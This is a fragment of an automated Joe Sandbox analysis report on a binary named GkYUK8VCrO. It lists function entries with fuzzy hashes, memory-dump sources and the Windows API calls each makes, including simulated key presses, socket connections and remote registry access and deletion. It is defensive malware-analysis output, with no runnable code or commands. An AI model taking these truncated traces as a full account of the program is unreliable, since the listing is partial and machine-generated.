                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: 9dd33d80b35e5a3b98dcd152736e496a58a23dc1c0d38f5400a473ae048f4293
                                • Instruction ID: 6df95b65f26b0f1867ddaf3f91ec3310aa3d009f1e2acc522e7390eef7aac6a3
                                • Opcode Fuzzy Hash: 9dd33d80b35e5a3b98dcd152736e496a58a23dc1c0d38f5400a473ae048f4293
                                • Instruction Fuzzy Hash: A551D4A06047D53EFB3A463C8C45BBA7EE9AB46304F0C49C9E1D65A8D2C7D5DC84D750
                                APIs
                                • GetParent.USER32(00000000), ref: 00B012B5
                                • GetKeyboardState.USER32(?), ref: 00B012CA
                                • SetKeyboardState.USER32(?), ref: 00B0132B
                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B01357
                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B01374
                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B013B8
                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B013D9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: b4decc76eb9d5aa9803d1f99c31d0a2ecc9e57ccaff3f7d017e60c2a3fb5e39b
                                • Instruction ID: 3edc90eebfa32917b137b9efaeaa4f4eb04b1917e9b0352edfd49323f2c19de5
                                • Opcode Fuzzy Hash: b4decc76eb9d5aa9803d1f99c31d0a2ecc9e57ccaff3f7d017e60c2a3fb5e39b
                                • Instruction Fuzzy Hash: 3851F4A09047D53EFB3A87288C55B7ABFE9EB06300F088DC9E1D4568D2D794EC94D764
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _wcsncpy$LocalTime
                                • String ID:
                                • API String ID: 2945705084-0
                                • Opcode ID: 0a6faa25902aae751a6e653f3604cb9a27dc0db3592c988720577f1e968065e2
                                • Instruction ID: adf05ade19293712642031bd5eef1c537a236493ae6724fe852754a1d7b7c54d
                                • Opcode Fuzzy Hash: 0a6faa25902aae751a6e653f3604cb9a27dc0db3592c988720577f1e968065e2
                                • Instruction Fuzzy Hash: CB41A16AC2061876CF20EBB48986FCFB7AC9F04310F51856AF518E3161E634E715C7A9
                                APIs
                                  • Part of subcall function 00B048AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B038D3,?), ref: 00B048C7
                                  • Part of subcall function 00B048AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B038D3,?), ref: 00B048E0
                                • lstrcmpiW.KERNEL32(?,?), ref: 00B038F3
                                • _wcscmp.LIBCMT ref: 00B0390F
                                • MoveFileW.KERNEL32(?,?), ref: 00B03927
                                • _wcscat.LIBCMT ref: 00B0396F
                                • SHFileOperationW.SHELL32(?), ref: 00B039DB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                • String ID: \*.*
                                • API String ID: 1377345388-1173974218
                                • Opcode ID: 1c8e531a02037d04002d9e094c5a491122deddbddaf6fe37866c6789ba9414a1
                                • Instruction ID: 87a2e802d002953e8d5caa00f65ca8b4fa23dedfad6711723d51d9016f229cc2
                                • Opcode Fuzzy Hash: 1c8e531a02037d04002d9e094c5a491122deddbddaf6fe37866c6789ba9414a1
                                • Instruction Fuzzy Hash: 104173B15083849ED761EF64C485AEFBBECEF89740F44096EB48AC3191EB74D688C752
                                APIs
                                • _memset.LIBCMT ref: 00B27519
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B275C0
                                • IsMenu.USER32(?), ref: 00B275D8
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B27620
                                • DrawMenuBar.USER32 ref: 00B27633
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Menu$Item$DrawInfoInsert_memset
                                • String ID: 0
                                • API String ID: 3866635326-4108050209
                                • Opcode ID: d09f1539a53d7945728a757eb03a3ef3f4632598dbf3268146b683fb12a15f1d
                                • Instruction ID: 159e86be4c91f662d99d780de64232529ffd4edde7c4322c563cee24c7025fc8
                                • Opcode Fuzzy Hash: d09f1539a53d7945728a757eb03a3ef3f4632598dbf3268146b683fb12a15f1d
                                • Instruction Fuzzy Hash: 0F415B75A04619EFDB21DF55E884EAABBF8FF08310F048069F91997290DB30AD50CF91
                                APIs
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B2125C
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B21286
                                • FreeLibrary.KERNEL32(00000000), ref: 00B2133D
                                  • Part of subcall function 00B2122D: RegCloseKey.ADVAPI32(?), ref: 00B212A3
                                  • Part of subcall function 00B2122D: FreeLibrary.KERNEL32(?), ref: 00B212F5
                                  • Part of subcall function 00B2122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B21318
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B212E0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                • String ID:
                                • API String ID: 395352322-0
                                • Opcode ID: 1859621d005c89f3c55c0acad5ddaa86eac5898da4b22e5f1aa6185a01bd1baf
                                • Instruction ID: b38856ed8d4f29fcb3dad1c47654bb5581cc940e4ffde91f4f7d16cf4cf52e2d
                                • Opcode Fuzzy Hash: 1859621d005c89f3c55c0acad5ddaa86eac5898da4b22e5f1aa6185a01bd1baf
                                • Instruction Fuzzy Hash: 673119B1901119BFDB14DF94EC89EFFB7BCEB18300F1005BAE505E3151EA749E4A9AA4
                                APIs
                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B2655B
                                • GetWindowLongW.USER32(01125920,000000F0), ref: 00B2658E
                                • GetWindowLongW.USER32(01125920,000000F0), ref: 00B265C3
                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B265F5
                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B2661F
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B26630
                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B2664A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: LongWindow$MessageSend
                                • String ID:
                                • API String ID: 2178440468-0
                                • Opcode ID: 801ed23e966afbdb8991e15f9a532766deb4b42335aba30a7b40dd600541bfc5
                                • Instruction ID: d9604ac735414051ca520bd1d6a9b73be778f897b6fc5ad8fe31e04fcdec740e
                                • Opcode Fuzzy Hash: 801ed23e966afbdb8991e15f9a532766deb4b42335aba30a7b40dd600541bfc5
                                • Instruction Fuzzy Hash: 49311330604265AFDB21CF28EC84FA53BE5FB5A710F1801A9F509CB2B5CB71AC40DB81
                                APIs
                                  • Part of subcall function 00B180A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B180CB
                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B164D9
                                • WSAGetLastError.WSOCK32(00000000), ref: 00B164E8
                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B16521
                                • connect.WSOCK32(00000000,?,00000010), ref: 00B1652A
                                • WSAGetLastError.WSOCK32 ref: 00B16534
                                • closesocket.WSOCK32(00000000), ref: 00B1655D
                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B16576
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                • String ID:
                                • API String ID: 910771015-0
                                • Opcode ID: d6182cc0b60405e9244f07753db98b145a401977e39411f461bac0247d6fcb51
                                • Instruction ID: 77bd767feb5d37866e8c263c35ade5dd864145cb2763eddcfd1af897cd3af90f
                                • Opcode Fuzzy Hash: d6182cc0b60405e9244f07753db98b145a401977e39411f461bac0247d6fcb51
                                • Instruction Fuzzy Hash: 1A31A171600118AFDB10AF24CC85BBE7BF9EB45760F4040A9F9059B291DB70AD45CB61
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE0FA
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE120
                                • SysAllocString.OLEAUT32(00000000), ref: 00AFE123
                                • SysAllocString.OLEAUT32 ref: 00AFE144
                                • SysFreeString.OLEAUT32 ref: 00AFE14D
                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00AFE167
                                • SysAllocString.OLEAUT32(?), ref: 00AFE175
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                • String ID:
                                • API String ID: 3761583154-0
                                • Opcode ID: 39ede024f90d19a847f660afee309bcc4561f7263d518574a6f8488c5729ea7c
                                • Instruction ID: 8ecb19d169d613bd77ac64fb8722c695c8b68582ac085757182c21a181c99479
                                • Opcode Fuzzy Hash: 39ede024f90d19a847f660afee309bcc4561f7263d518574a6f8488c5729ea7c
                                • Instruction Fuzzy Hash: 3421513560410DAF9B20EFA9DC89DBB77ACEB19760B508235FA15CB260DA749C418B64
                                APIs
                                  • Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
                                  • Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
                                  • Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91
                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B278A1
                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B278AE
                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B278B9
                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B278C8
                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B278D4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$CreateObjectStockWindow
                                • String ID: Msctls_Progress32
                                • API String ID: 1025951953-3636473452
                                • Opcode ID: ab792a82d4d28efa1a489b04a9a0c5473eaacd37edddb27f2bf89146f93990e9
                                • Instruction ID: 9943329e64ca1bda2bd3ddec254f0a7e14cd826402e587973aa09cf8c0ee42dc
                                • Opcode Fuzzy Hash: ab792a82d4d28efa1a489b04a9a0c5473eaacd37edddb27f2bf89146f93990e9
                                • Instruction Fuzzy Hash: 981182B255022ABFEF159F61DC85EE77F6DEF08758F014115FA08A60A0CB729C21DBA4
                                APIs
                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AC4292,?), ref: 00AC41E3
                                • GetProcAddress.KERNEL32(00000000), ref: 00AC41EA
                                • EncodePointer.KERNEL32(00000000), ref: 00AC41F6
                                • DecodePointer.KERNEL32(00000001,00AC4292,?), ref: 00AC4213
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                • String ID: RoInitialize$combase.dll
                                • API String ID: 3489934621-340411864
                                • Opcode ID: 7be6a33d4d5abfb80d768d6eb6cff2717bdac9a42e2a1753a85e1ff30e4ca6cf
                                • Instruction ID: b2362ecf212fbdf514af75e5e30fb9673a29bed8b6d8c7068548df2dd0244735
                                • Opcode Fuzzy Hash: 7be6a33d4d5abfb80d768d6eb6cff2717bdac9a42e2a1753a85e1ff30e4ca6cf
                                • Instruction Fuzzy Hash: C9E0E5B0691701ABEB209BB0EC09B643EA4AB2AB02F505438F411E70E0DFF940968F08
                                APIs
                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AC41B8), ref: 00AC42B8
                                • GetProcAddress.KERNEL32(00000000), ref: 00AC42BF
                                • EncodePointer.KERNEL32(00000000), ref: 00AC42CA
                                • DecodePointer.KERNEL32(00AC41B8), ref: 00AC42E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                • String ID: RoUninitialize$combase.dll
                                • API String ID: 3489934621-2819208100
                                • Opcode ID: 0ba654f2cb4a5b4ed854ce47cc54c87fbcc44de82a7bab437683640228efe499
                                • Instruction ID: 61705a2dcc536e04ec91f0df576a5e153a19d4768467d036f319cd123132f08e
                                • Opcode Fuzzy Hash: 0ba654f2cb4a5b4ed854ce47cc54c87fbcc44de82a7bab437683640228efe499
                                • Instruction Fuzzy Hash: BAE09278581702ABEA209B60EE09B543EB4BB2AB42F204038F011E70E0CFB84591CA18
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memmove$__itow__swprintf
                                • String ID:
                                • API String ID: 3253778849-0
                                • Opcode ID: fe2f17f79ebd84cb438237771d0d4cdbd62087dd95f3309a9b711921911bb9bb
                                • Instruction ID: 95c1139dcf5fba01f551c8a803d1eb4ef9d9c7fecb8dfd9312b508439fc645ff
                                • Opcode Fuzzy Hash: fe2f17f79ebd84cb438237771d0d4cdbd62087dd95f3309a9b711921911bb9bb
                                • Instruction Fuzzy Hash: 5B619E3060065AABDF11EF60CD81EFF3BA4AF4A308F054599F8555B1E2DB359D51CB60
                                APIs
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                  • Part of subcall function 00B210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B20038,?,?), ref: 00B210BC
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20548
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B20588
                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B205AB
                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B205D4
                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B20617
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B20624
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                • String ID:
                                • API String ID: 4046560759-0
                                • Opcode ID: 83827adb0d6fd0e179e754d72b20fc0b06243a807f5e42f9d7686b87601eb9e4
                                • Instruction ID: 46876f4573890caf348eb966e040ade5c667c796ac37ef7b197c1f3d1e761259
                                • Opcode Fuzzy Hash: 83827adb0d6fd0e179e754d72b20fc0b06243a807f5e42f9d7686b87601eb9e4
                                • Instruction Fuzzy Hash: 13514431218200AFCB15EF24D985E6FBBE8FF89314F04496DF589872A2DB31E905CB52
                                APIs
                                • GetMenu.USER32(?), ref: 00B25A82
                                • GetMenuItemCount.USER32(00000000), ref: 00B25AB9
                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B25AE1
                                • GetMenuItemID.USER32(?,?), ref: 00B25B50
                                • GetSubMenu.USER32(?,?), ref: 00B25B5E
                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B25BAF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Menu$Item$CountMessagePostString
                                • String ID:
                                • API String ID: 650687236-0
                                • Opcode ID: 18d331f521a78a96f9eaf965462c37426782d8c4319f9059e2fc2e4a8dc48beb
                                • Instruction ID: 23ec722fe4ac74cb49a6714a1648bb9ec3b3cf5bf121777a0103b6631c814482
                                • Opcode Fuzzy Hash: 18d331f521a78a96f9eaf965462c37426782d8c4319f9059e2fc2e4a8dc48beb
                                • Instruction Fuzzy Hash: 32517F35A00625EFCF21EF64D985AAEB7F4EF49320F1044A9E815B7391CB70AE41CB90
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 00AFF3F7
